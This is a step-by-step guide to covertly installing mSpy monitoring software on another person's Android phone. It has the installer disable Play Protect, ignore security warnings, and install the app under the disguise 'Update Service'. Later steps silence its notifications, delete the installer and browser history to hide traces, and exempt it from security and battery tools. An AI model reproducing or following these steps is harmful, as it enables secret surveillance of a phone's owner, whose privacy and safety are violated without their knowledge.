Disable PlayProtect on the device you want to monitor
1. Go to 'Play Store'.
2. Tap 'Menu button' (three lines in the top left corner).
3. Find and tap 'Play Protect'.
4. 'Settings (cogwheel)'.
5. Disable 'Scan device for security threats'.
Download mSpy installer
1. 'Open a browser' (Chrome).
2. Tap on the address bar.
3. Enter the link 'b55y.net/a' and press 'Go'.
4. Draw the shape, once successful click 'Download' → 'Ok'.
5. If a security prompt appears, press 'Ignore'.
6. Find an app called 'Update Service' and open it.
1. Tap 'Allow' for all permissions.
2. Tap 'Ok' → turn on the toggle on the next screen.
"3. 'Ok' ⭢ Tap 'Change Wi-Fi connectivity' ⭢ 'Always Allow'. Tap 'Display pop-up windows while running in the background' ⭢ 'Always Allow'.
Tap 'Display pop-up window' ⭢ 'Always Allow'."
4. Tap 'Ok' ⭢ 'More downloaded services' → enable 'Framework update service'.
5. Tap 'Ok' ⭢ 'Update Service' ⭢ enable 'Permit usage access'
6. Tap 'Ok' ⭢ 'Start now'.
7. Tap 'Ok'. Tap 'Not optimized' → 'All apps'. Find and tap 'Update Service' → 'Don't optimise'.
8. Tap 'Ok' ⭢ disable 'Show notifications'.
9. Click on the area above 'Complete installation' and enter the registration code. Here is how you can find the Registration code.
10. Press 'Complete installation'.
11. Go to 'Settings' ⭢ 'Apps' ⭢ 'Google Play Store' ⭢ 'Notifications' ⭢ disable 'Show notifications'.
1. Go to 'Chrome' → tap on three dots → 'Settings'.
2. Go to 'Privacy' → 'Clear browsing data' → 'Clear data'.
3. Go to the home screen and find the 'File Manager'.
4. Go to 'APKs' → delete 'bt.apk'.
Add mSpy to Unmonitored apps
1. Go to 'Settings' → 'Manage Apps' → 'Update Service'.
2. Turn on 'Autostart'.
3. Go to 'Settings' → 'Battery & Performance'.
4. Click on the 'Settings' icon in the top right corner.
5. Tap 'Turn off mobile data when device is locked' → 'Never'.
6. Tap 'Clear cache when device is locked' → 'Never'.
7. Turn off 'Battery drain notifications'.
8. Go to the home screen.
9. Find an app called 'Security'.
10. Click on the 'Settings' icon in the top right corner.
11. Tap 'Boost speed' → 'Lock apps'.
12. Turn on 'Update Service'.
13. Go back to 'Security' → 'Settings'.
14. Tap 'Cleaner'.
15. Turn off the 'Remind to clean' and 'Update automatically' options.
16. Go back.
17. Tap 'Security scan'.
18. Turn off 'Auto updates'.
Turn on Location
Touch the screen in two places and pull down the extended menu from the top of the screen → 'Enable Location'.